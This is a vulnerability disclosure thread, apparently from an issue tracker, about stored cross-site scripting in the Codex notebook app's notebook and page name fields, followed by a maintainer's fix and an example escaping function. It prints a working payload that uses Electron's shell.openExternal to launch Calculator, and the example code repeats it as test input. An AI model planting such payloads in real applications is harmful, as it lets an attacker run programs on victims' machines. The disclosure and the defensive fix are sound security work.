Cross-site scripting (XSS) on Codex Notebook/Page name leads to code execution.
Reproduction
Open Codex
Create new Notebook
Insert payload on the Notebook (or page) name field
On Mac <a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>
On Windows <a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>
Once you move your mouse over the link "test", Calculator will be opened.
Mitigation
Disable nodeIntegration
Thank you very much for letting me know about this. I've made it so that it sanitizes/escapes the notebook's name/icon text and page's name.
About disabling nodeIntegration, I'm going to do a project rewrite soon that will make the main/renderer processes interact the way they're supposed to do securely, and that'll include disabling nodeIntegration. But I just wanted to get this fix out quickly and that rewrite is gonna take a while.
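The two fixes discussed in this thread, escaping the notebook/page name and turning off nodeIntegration, sketched as an added example (not Codex's actual code; `escapeHtml`, `renderNotebookItem` and the `notebook` class are hypothetical names):

```javascript
// Added example, not Codex's code. Function and class names are hypothetical.

// The five characters that can change HTML parsing context, and their entities.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Escape a user-controlled string so it is rendered as text, never as markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build sidebar markup for a notebook. The name is used both in an attribute
// (title) and as element text, so it is escaped in both places.
function renderNotebookItem(name) {
  const safe = escapeHtml(name);
  return `<li class="notebook" title="${safe}">${safe}</li>`;
}

// Defense in depth: renderer settings, passed in the main process as
//   new BrowserWindow({ webPreferences: hardenedWebPreferences })
// With nodeIntegration off, require() is not available to page script,
// so an injected event handler cannot reach require('electron').shell.
const hardenedWebPreferences = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
};

// Constructed sample input: the notebook name from the report above.
const reportedName =
  `<a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>`;

// Returns the markup produced for the reported name; the anchor tag and its
// handler come out as inert text inside the <li>.
function demo() {
  return renderNotebookItem(reportedName);
}

console.log(demo());
```

Where the name is written through the DOM rather than an HTML string, assigning it with `textContent` instead of `innerHTML` achieves the same result without a hand-written escaper.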